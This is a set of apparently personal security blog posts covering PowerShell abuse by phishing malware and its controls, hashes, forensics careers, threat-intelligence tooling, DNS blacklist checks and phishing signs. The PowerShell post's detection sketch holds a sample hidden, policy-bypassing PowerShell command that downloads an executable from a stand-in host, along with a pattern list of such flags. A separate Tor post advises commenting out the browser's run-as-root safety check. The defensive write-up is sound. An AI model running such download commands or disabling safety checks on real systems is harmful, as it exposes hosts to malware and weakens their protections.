PowerShell : Tool for Admins and Adversaries

Readers!

For the last couple of weeks I have been analysing malware, mostly delivered via phishing attempts. What our adversaries are doing is first gaining easy access to the machine via phishing, then creating background processes that call out to compromised domains and download an executable packed with a malicious payload. Below is a basic timeline of a phishing email with an attachment.

timeline

The technique is neither new nor unique; however, if we look at the trend we can see that most attacks use similar tools and procedures. One such tool is PowerShell. This blog is not about what PowerShell is, but about how our adversaries are abusing a tool that was created to automate admin tasks within the Windows environment. Since automation was one of its key goals, PowerShell was given a scripting capability, which allows admins to automate tasks such as configuration management. (And here I go, explaining what PowerShell is.)

Microsoft certainly didn't intend the tool to be a security product, and to this date one can use PowerShell to perform malicious activities. However, certain controls and functionality within PowerShell can assist us in controlling the type of scripts that can run on our systems.

There are indeed multiple security controls, which we will discuss later in the blog, but first let's see what our adversaries are doing. I will not go into the specific analysis of a malware sample, as I am trying to reach the teams responsible for detecting/preventing these types of attacks by placing feasible and actionable security controls around PowerShell.

Below is a sample PowerShell command seen in most cases:

ps-command

Frequently used parameters:

  1. ExecutionPolicy bypass – Execution policies in PowerShell determine whether a script can run and what type of scripts can run, and can set a default policy. Microsoft added a value called 'Bypass' which, when used, skips the currently assigned execution policy and runs the script without any warnings. There are 4 main types of execution policies:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. WindowStyle hidden – This parameter is used when a PowerShell script needs to run in the background without the user's knowledge.
  3. NoProfile – A PowerShell profile is a set of commands (it is actually a PowerShell script) that runs at startup, normally for the current user and host. Setting -NoProfile launches the script without loading any profiles.
  4. DownloadFile – A WebClient method used to download a file over the web.
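To make these parameters actionable for detection teams, here is a minimal Python sketch that flags a command line combining them. This is illustrative only, not a production detection rule – the patterns are simply the parameters discussed above:

```python
# Minimal sketch: flag PowerShell command lines that combine the
# parameters discussed above. Illustrative only, not a real detection rule.
import re

SUSPICIOUS_PATTERNS = [
    r"-executionpolicy\s+bypass",
    r"-windowstyle\s+hidden",
    r"-noprofile",
    r"\.downloadfile\(",
]

def suspicious_flags(command_line):
    """Return the suspicious patterns present in a command line."""
    lowered = command_line.lower()
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, lowered)]

sample = ("powershell.exe -ExecutionPolicy bypass -WindowStyle hidden "
          "-NoProfile (New-Object System.Net.WebClient)"
          ".DownloadFile('http://example.com/a.exe','a.exe')")
print(len(suspicious_flags(sample)))  # 4
```

A single flag on its own is often benign; it is the combination of several in one command line that is worth alerting on.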

Tools, Techniques and Procedures:

  1. The attachments, as shown in the first screenshot, are mostly Word/Excel documents with macros, or zip files containing JavaScript.
  2. The macros or JS are heavily obfuscated, sometimes only lightly. For heavily obfuscated scripts I rely on dynamic analysis (the best way to know what the malware was written for). Some scripts, with practice, I can deobfuscate within minutes.
  3. The PowerShell commands mostly download files from sites over HTTP rather than HTTPS (though some sophisticated adversaries have created/compromised HTTPS websites). I have also sometimes noticed cmd.exe /c being used, which invokes the specified command and then terminates.
  4. Files on the compromised domain are mostly Windows executables with the '.exe' extension, or sometimes the extension is hidden. This depends on the adversary and the packers they have used. Sometimes you can unpack the 'exe' with 7zip.
  5. Based on the command, the file will first be downloaded and then executed. In certain cases I have seen the file get deleted after execution. Again, it depends on the command.
  6. Most malware that I have analysed was either ransomware or an information stealer, and sometimes a combination of both.

The above TTPs are very simple to understand; however, implementing security controls, say for each step, to detect and prevent them is much harder. As a team or as individuals we are working towards reducing the impact of an incident. Consider the phases of the cyber kill-chain, perform an analysis of incidents within your team, understand at which phase you are able to catch the adversary, and ask whether you can do it earlier.

Observables such as IP addresses, domains, URLs and file hashes, with context, are the IOCs that we normally look for and use for detection and prevention. Some people call that Threat Intelligence. Darwin would have gone, 'Seriously?'

download

Security controls such as endpoint solutions, proxies, IDPS and firewalls can help us, but they are heavily dependent on what they know, and history has shown that they can be bypassed. However, they are still very good controls for reducing the impact and/or preventing known attacks or IOCs.

What we need are security controls based on TTPs. So let's look at some controls that can be implemented to detect and/or prevent such attacks:

  1. DO NOT give admin privileges to the local account. If required for a role, use an admin password generator together with User Account Control (UAC) enabled, which will prompt for the Administrator password every time a system change is made, such as installing a program or running an admin task.
  2. Use group policies so that certain tasks, especially script execution and writing to the registry and the Windows directory, are only allowed for Administrators. Administrative Templates can be used for this.
  3. Use a group policy that does not allow any executables in the TEMP directory to be saved/executed.
  4. Sign all PowerShell scripts. If that is not possible, or the team is not willing to sign, the restrictions placed via the above-mentioned points can assist.
  5. You can also set the execution policy to Restricted, so that no scripts run and PowerShell can only be used interactively. Organisations that are not pushing any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tool can help define what level of access a user has on the system with regards to executables, scripts and DLLs.
  7. Having AppLocker in Allow mode, with a rule that only scripts in trusted locations can run, can assist the team. An attacker can rewrite the rule, provided he/she has admin privileges on the system.
  8. PowerShell language modes – Admins can set the language mode to Constrained Language Mode, which permits all Windows cmdlets and all Windows PowerShell language elements but limits the permitted types. It keeps a list of types that are allowed within a PowerShell script. For example, the New-Object cmdlet can only be used with allowed types, and that list does not contain System.Net.WebClient.
  9. Logging of PowerShell is also important. Here, in my opinion, Sysmon is a must-have, and its logs can be forwarded to a SIEM for correlation. If Sysmon is not feasible, enabling PowerShell module logging is highly recommended. Enhanced logging is always recommended, and I will write another blog on that.
  10. Configure the organisation's proxy properly to detect/prevent web requests invoked via PowerShell. I have tested the Invoke-WebRequest cmdlet, which shows 'WindowsPowerShell' within the User-Agent. However, no User-Agent string was observed when the above-mentioned DownloadFile method was used. Perhaps proxies can be configured to disallow any traffic without a User-Agent – I still have to verify whether such functionality exists. If not, a SIEM rule can be used to alert on web traffic with no User-Agent string going to external sites and downloading files.
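The SIEM idea from the last point can be sketched in a few lines of Python. The record fields here ('url', 'user_agent', 'bytes_in') are hypothetical placeholders, not a real proxy log schema:

```python
# Sketch: flag proxy log entries where an external download carried
# no User-Agent string. Field names are invented for illustration.
def flag_missing_user_agent(records):
    """Return records that fetched an external URL with no User-Agent."""
    flagged = []
    for rec in records:
        external = not rec["url"].startswith("http://intranet.local")
        no_agent = not rec.get("user_agent")
        downloaded = rec.get("bytes_in", 0) > 0
        if external and no_agent and downloaded:
            flagged.append(rec)
    return flagged

logs = [
    {"url": "http://evil.example/a.exe", "user_agent": "", "bytes_in": 50000},
    {"url": "http://intranet.local/page", "user_agent": "", "bytes_in": 1200},
    {"url": "http://news.example/", "user_agent": "Mozilla/5.0", "bytes_in": 800},
]
print(len(flag_missing_user_agent(logs)))  # 1
```

In a real SIEM you would express the same logic as a correlation rule over your proxy log source rather than as a script.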

Please note that AppLocker and PowerShell Constrained Language Mode are not bulletproof security features but another layer of defence, which can help reduce the impact of an attack and in some cases completely prevent the execution of foreign scripts.

When making a business case to the board or C-level executives for any changes in the organisation, the presenter should use language they understand. As part of the evidence, it is highly recommended to show actual incidents where the current security controls failed, impacting user productivity, causing loss of data, and costing hours to recover and restore systems. They want to know how any suggested changes will help reduce the impact to the user or the business.

If there are other methods that other organisations are using, please let me know.

A good read – PowerShell for Blue Team

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and Happy new year to all. The days of holiday spam and vendor predictions are here.

Here I am, spending a summer afternoon watching TV and writing on my blog. As I am a bit lazy during the holidays, I am posting something simple. The post is about hash values and how trivial yet important they are in identifying malicious files/programs.

You can read about Hash here.

Hash values are important, first of all, for verifying files. Think of a hash as a signature or fingerprint. Just as living beings have signatures or fingerprints by which we can recognise them, files have something called a digital fingerprint by which we can identify them.

Take the example of HashCalc. The following screenshot shows the different hash values of HashCalc.exe.

hashcalc

As you can see, HashCalc provides a lot of information (the digital fingerprint) about itself. With regards to security, hashes are normally used to verify a file, as mentioned earlier. Let's look briefly at the commonly used hash values:

  • MD5 – Based on the Message Digest algorithm. Normally represented as 32 hexadecimal digits (a 128-bit digest). Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 hexadecimal digits, generating a 160-bit message digest. Vulnerable to collision attacks and deprecated in favour of SHA-2 and SHA-3. Read further here.
  • SHA-256 – Part of the Secure Hash Algorithm 2 family, represented as 64 hexadecimal digits (a 256-bit digest). The SHA-2 family has six variants – SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256. Read further here.
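The digest lengths above are easy to confirm with Python's standard hashlib module:

```python
# Confirming the digest lengths described above with Python's hashlib.
import hashlib

data = b"hello world"

md5 = hashlib.md5(data).hexdigest()
sha1 = hashlib.sha1(data).hexdigest()
sha256 = hashlib.sha256(data).hexdigest()

# 32, 40 and 64 hexadecimal digits respectively.
print(len(md5), len(sha1), len(sha256))  # 32 40 64
```

Run the same input twice and you get the same digest, which is exactly why a hash works as a fingerprint.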

Now, why this blog entry? The information is available on Google and Wikipedia. The reason is that hash values are considered a trivial yet important artefact in the Threat Intelligence and cyber security world. Lots of OSINT and vendor intelligence systems share hash values of known malware droppers. These could be executables, MS Office documents, Adobe documents, image files, etc.

Following are a few scenarios where hash values can assist:

  • Hash values can assist in identifying whether the file/program that we have is legitimate or not.
  • Malware analysis blogs will almost always provide the hash values of the identified files/programs.
  • Hash values are also used by endpoint solutions to detect known malicious files/programs.
  • During incident response, one can also use hash values in YARA rules to detect malicious files/programs.
  • Organisations can keep a list of hash values of known-good and authorised programs, which can then be used to identify unwanted programs on a system, either via the endpoint for real-time detection and/or during incident response. Benchmarking/baselining is a complicated process and sometimes not feasible in large organisations.
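The known-good list idea from the last point can be sketched like this. All file names and contents here are made up for illustration:

```python
# Sketch of baselining: compare observed file hashes against a set of
# known-good hashes. All names and contents are invented for illustration.
import hashlib

def file_hash(content):
    """SHA-256 hex digest of a file's raw bytes."""
    return hashlib.sha256(content).hexdigest()

# Hypothetical known-good baseline (in practice something like the
# NIST known-good hash sets mentioned below).
baseline = {file_hash(b"authorised program v1")}

def unknown_files(files):
    """Return names of files whose hash is not in the baseline."""
    return [name for name, content in files.items()
            if file_hash(content) not in baseline]

observed = {
    "calc.exe": b"authorised program v1",
    "dropper.exe": b"something else entirely",
}
print(unknown_files(observed))  # ['dropper.exe']
```

The hard part in the real world is not the comparison but building and maintaining the baseline, which is why baselining is often infeasible in large organisations.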

NIST provides a list of known-good hash values of legitimate programs that one can use to compare good vs bad. Read here.

Hash values are just another indicator, but one that gives a more targeted detection of malicious files/programs. IP addresses and URLs are dynamic, not 100% reliable, and have a low confidence level as threat indicators; hash values are therefore considered an important artefact in the security world.

Happy Holidays!

 

Forensics – Where to start and What to know

Readers

I would like to share my experience and understanding of forensics, and where I started in order to get a foothold in the field.

Questions that I normally get: I want to get into forensics. What should I study? What kind of certificates are good? What background should I have?

In this blog I will answer those questions based on my experience. I will not dwell on explaining what forensics is and why we perform it; for that you can just google it and/or read my blog entry – Incident Response and Forensics: The Two Towers. Understand that forensics is considered a specialised field, meaning one must have prior knowledge of fundamentals such as operating systems, networking, packet analysis, incident handling, etc.

I started in technical support – first because I was a student, and second because technical support staff work through numerous issues and fixes throughout the day, which can extend into forensic investigation. For example, a user calls in saying "my system is working slowly" – a tech support person will first investigate why and then provide a solution/workaround based on the findings. This helped me understand system internals, especially Windows. One must understand how an operating system works – its processes, services, kernel-level attributes, etc. A very good link to start is here for Windows, here for Mac OS X and here for Linux. I will be creating a mind map for this and will provide it on my GitHub account.

Certificates such as SANS GCFE will give you insight into Windows operating system forensics. Individuals thinking of this course should read more here.

Other courses and comparison can be viewed here.

We obviously need tools to perform forensics, and there are numerous tools available depending on what is required. SANS has its own Linux distribution, SIFT, and further information can be found here.

There is also a debate that system admins make the best forensic examiners or investigators, and I don't agree with that statement. Yes, system admins have knowledge of the system, but it is mostly about hardening and fixing issues; the security aspect is rarely covered on the system admin side. A system admin will still need to learn and/or go through training (self-paced or class-based) and understand how their experience overlaps with forensics.

To gain a bit more knowledge about networking, incident handling and packet analysis, I moved into a SOC (security operations centre). This allowed me to understand how an operating system communicates with other operating systems, the network, and/or external systems. In the SOC I was responsible for identifying anomalies and developing SIEM content to identify incidents within the network and/or operating system based on known bad behaviour – which also taught me what good behaviour looks like. All operating systems log events, and one must understand what those events mean, in what situations they are triggered, and how to use them to identify unauthorised activity and/or unusual behaviour. During forensics, this knowledge allowed me to investigate an operating system and/or infected host in a different manner. Yes, forensics and incident response overlap; they are two sides of the same coin. I always took initiative, and that helped me in the field.

To understand how forensics should be performed, one must also understand standards and RFCs. Understanding these allowed me to grasp how the corporate world and/or any forensics practice should perform forensics and how it can be integrated into incident response. Have a read here for the NIST publication, here for the RFC, and here for the NIST mobile forensics publication.

This should be a good start for individuals interested in forensics. One should also dive into the operating system they normally use at work/home on their laptop/desktop and go through the system. For Windows, work with PowerShell, look at Event Viewer and services, and use the Sysinternals tools. Fire up Wireshark and/or Chrome net-internals to see what happens when you access a website. Note down whatever is considered normal behaviour. For Linux/Mac, look at the logs under /var/log.

Lastly, read blogs related to forensics and incident response, which will give you good insight into tool usage, how forensics is performed, current methodologies, and the types of investigations.

Few Forensics Blogs :

Another point I will raise: certifications are not the only way to understand or gain knowledge in forensics. Practice and dedication to self-learning, applied on a regular basis, will help a lot. But in the corporate world these certifications are considered an entry point, and it is advisable to get them. I have done SANS certifications (I am not advocating or advertising SANS for personal gain, just sharing my personal experience), and I believe they concentrate on fundamentals and have better content for the topics they cover.

I will be providing more links in the upcoming mind map. I will also be sharing any forensic and/or IR investigations that I perform in my home lab, including tool usage.

Happy Forensicating!!!!!

The Vendor, The MSSPs and The Consultant

I have been waiting quite a while to write something about my experience with vendors, MSSPs and consultants. This is my own opinion and is not targeting any specific entity. I have worked with multiple vendors, MSSPs and consultants, and what I have always noticed is the "OUR" attitude. I do understand they are there to make money and sell their services/solutions, but there is nothing wrong with sprinkling that with some honesty.

  • Vendors – Buy our products and you will be safe.
  • MSSPs – Subscribe to our services and you will be safe.
  • Consultants – Implement our recommendations and you will be safe.

We all know that once you are connected to the Internet, eventually someone will target you and successfully gain access to your systems. It's not about 'if', it's about 'when' (SANS GCIH). There are no "PERFECT" systems. There are ways to access air-gapped systems too, but that is beyond this article.

The way I see it: vendors are for detection and prevention. MSSPs are more reactive – lots of customers but few eyes, and sometimes those eyes are not very experienced. Consultants – how many have actually used the product they are endorsing/recommending? Wouldn't it be better if they recommended a product/solution that they have actually used?

This attitude is one of the many reasons why organisations get breached – of course, security awareness and correct implementation of security controls are also required – but imagine if all three worked together and provided honest, correct and proactive solutions to customers; it would be a completely different picture. Organisations also need to invest heavily in people. Many organisations rely on outsourcing their security and depend on it completely. This concept is wrong: every organisation should have an internal security team with expertise in multiple areas, to keep additional eyes on the organisation.

Understand: our adversaries – CYBER CRIMINALS – work as a team and with a strategy, and we should too.

CIF – Collective Intelligence Framework – My deployment

Morning Everybody!!!!

I have been working on sharpening my skills in Threat Intelligence and the available open source systems. As the title says, I have been working with CIF from CSIRT Gadgets and wanted to share my experience and my planned future developments.

Following are a few screenshots of the system:

threat-feeds, ioc-types, applications, cif-map

CIF comes with a few default threat feeds and parsers. The feed configurations define the parsers and the remote hosts that provide the feeds. IOCs (Indicators of Compromise) such as IP addresses, URLs, MD5 hashes, etc. are fetched from the feeds. The feed configurations are written in YAML – a human-readable, text-based language.

Visualisation is provided by Kibana (it works on Kibana 3 – shown above – and Kibana 4), with Elasticsearch (1.4) as the database. I am working on getting this updated to 2.x, which requires a full cluster upgrade.

Experience :

  • I am running it on an Ubuntu VM and have had no issues. Sometimes I do have to restart the apache2, elasticsearch and cif services to populate custom dashboards and real-time data, although this can be automated with a script or a cron job.
  • System responsiveness is very good and the intelligence feeds are quite good. It can easily be integrated with a SIEM for additional context.
  • If you are a security researcher and able to identify new IOCs, you can publish them on csirtg.io, and they can then be pulled as feeds into the system – https://csirtg.io/users/makflwana/feeds

Future work:

  • I am currently working on more open source feeds and writing parsers for them. I will be publishing them on my GitHub account: https://github.com/makflwana
  • STIX and TAXII – if I can
  • Working with CSIRT Gadgets on CIF v3 – Bearded Avenger

Final words:

This is an excellent open source initiative from CSIRT Gadgets (http://csirtgadgets.org/), providing us with a framework and platform to share intelligence. One of the reasons hackers are one step ahead is that they share information better than the organisations fighting them, and most of that sharing is free and happens underground – on the dark net, as we say. Meanwhile, vendors charge thousands and millions to share threat information.

 

Installing/running TOR on Linux distros

TOR – The Onion Router – is famous for anonymity. The TOR browser gives users an edge in staying anonymous while browsing.

Installing TOR on a Windows box is easy, but on Linux, especially as the root user, there are some issues. I faced the following errors when trying to execute or open the TOR browser:

1. The bundle cannot be run as a root user.
2. The browser unexpectedly closed and requires a reboot.

Steps to fix the issue – remember, it is not required to create a new user; root can run the browser:

1. Open start-tor-browser in nano, leafpad, gedit, etc. and comment out the root check as shown below:
#if [ "`id -u`" -eq 0 ]; then
#    complain "The Tor Browser Bundle should not be run as root. Exiting."
#    exit 1
#fi
2. Open a terminal and change ownership to root:
chown -hR root tor-browser_en-US/

Open the browser with ./start-tor-browser.desktop

Happy TORing…..

Command line use to check IP reputation

Looking up the reputation of an IP address is one of the most frequent tasks of a SOC analyst. There are a number of online tools and scripts that do the job.

However, I have always used the command line to identify whether an IP address is listed on any blacklist. The reason is that a number of online tools still show an IP as blacklisted when the actual blacklisting party, such as Spamhaus, has already removed the IP from its list.

An analyst can use either scripts or the command line to get the results. nslookup, dig and host can be used to check an IP address against known blacklist vendors. To do the check, the analyst needs to know that the information they are looking for is published via DNS records.

If an analyst is using online tools, he/she can enter the actual IP address, such as 1.2.3.4. However, for the command line one has to reverse the IP address octets to match the blacklist zone format.
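The octet reversal is trivial to script. Here is a small Python sketch (zen.spamhaus.org is the real Spamhaus zone; the function is just string manipulation and performs no network lookup):

```python
# Build a DNSBL query name by reversing the IP's octets, as described above.
def dnsbl_query(ip, zone="zen.spamhaus.org"):
    """Return the DNS name to look up for a DNSBL check of `ip`."""
    reversed_octets = ".".join(reversed(ip.split(".")))
    return f"{reversed_octets}.{zone}"

print(dnsbl_query("1.2.3.4"))  # 4.3.2.1.zen.spamhaus.org
```

The resulting name is what you would then pass to nslookup, host or dig, as in the samples below.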

samples :

nslookup 4.3.2.1.zen.spamhaus.org
host 4.3.2.1.zen.spamhaus.org
dig 4.3.2.1.zen.spamhaus.org

More blacklists to check :
zen.spamhaus.org
xbl.spamhaus.org
pbl.spamhaus.org
spam.abuse.ch
cbl.abuseat.org
virbl.dnsbl.bit.nl
dnsbl.inps.de
ix.dnsbl.manitu.net
dnsbl.sorbs.net
bl.spamcannibal.org
bl.spamcop.net
dnsbl-1.uceprotect.net
dnsbl-2.uceprotect.net
dnsbl-3.uceprotect.net
db.wpbl.info

Site to check one IP against multiple blacklists: http://multirbl.valli.org/

Ubuntu – Security Onion Networking issue

I have been using Security Onion for a while now. It is a very good OS for analysis and for getting IDS alerts on the go without buying expensive hardware. But recently, due to some updates, I have been facing issues with internet connectivity.

I am not sure what the network-manager updates do, but if you select "Install updates while downloading" while installing Security Onion, for some reason network-manager shows attitude and the internet connection simply gets lost after setting up the management and monitoring interfaces.

I searched the forums a lot and found multiple ideas. This is what got the internet working:

"sudo service network-manager restart", and also deleting the interface details from /etc/network/interfaces

This did get the internet started, but somehow monitoring on the interfaces did not work.

I also realised that the machine gets slower for some reason, regardless of whether Security Onion runs as a VM or as the host operating system.

I then tried not selecting the updates during installation and locked the version of network-manager in Synaptic Package Manager. Then I updated the system and rebooted.

The internet was working. I checked Sguil but saw no alerts for testmyids.com, although tcpdump did show the traffic.

Did a reboot and voilà... all working properly. I can see alerts in Snorby and Sguil.

Emails – The good, The bad and The ugly side

Email, as we know, is a very efficient way to communicate without physically visiting the intended recipients. Email has been with us for many years, and its original purpose was to reduce the time and effort spent on communication.

But nowadays email is also being used for social engineering and phishing. Forget the good old days when you received emails only from known parties. Now even a prince of Nigeria has your email address and wants to give you money.

As a security researcher and SOC analyst, I have noticed that email is the top channel used to deliver these malicious files. It's like yelling the name "John" in a crowd – somebody will eventually respond.

How do we detect suspicious emails?

  1. Language – typos and grammar mistakes will usually be there – though sometimes they are not.
  2. Sender domain – may have a typo, or may be a legitimate one.
  3. Hover your mouse over the embedded links in the email and you will see a random site.
  4. Attachments – names that are too close to legitimate ones, or otherwise suspicious.
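The four checks above can be sketched as a toy scoring function. Every field name and threshold here is invented for illustration; it is not a real email gateway API:

```python
# Toy scoring of the four checks above. Fields and thresholds are invented.
def phishing_score(email):
    """Count how many of the four suspicious-email checks fire."""
    score = 0
    if email.get("typos", 0) > 2:                             # 1. language
        score += 1
    if email.get("sender_domain_typo"):                       # 2. sender domain
        score += 1
    if email.get("link_text") != email.get("link_target"):    # 3. mismatched link
        score += 1
    if email.get("attachment", "").endswith((".js", ".exe")): # 4. attachment
        score += 1
    return score

msg = {"typos": 5, "sender_domain_typo": True,
       "link_text": "bank.com", "link_target": "evil.example",
       "attachment": "invoice.js"}
print(phishing_score(msg))  # 4
```

Real mail gateways use far richer signals, but the idea is the same: no single check is decisive, so you combine them into a score.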

The best way to fight this is user awareness. Email exploits the most vulnerable entity – the HUMAN: a mind where curiosity inevitably kills the cat.

Attackers thrive on two human characteristics – FEAR and CURIOSITY.

  1. FEAR – "We have noticed a suspicious transaction on your account. Please click on this link to change your password."
  2. CURIOSITY – "Sorry we missed you; we have a package waiting for you. Please open the attached file for more information." There is a package indeed, but for your PC – malware, I mean 🙂

Other ways to detect:

  1. Mail gateways with proper monitoring
  2. DLP – which can be used to monitor the content of emails.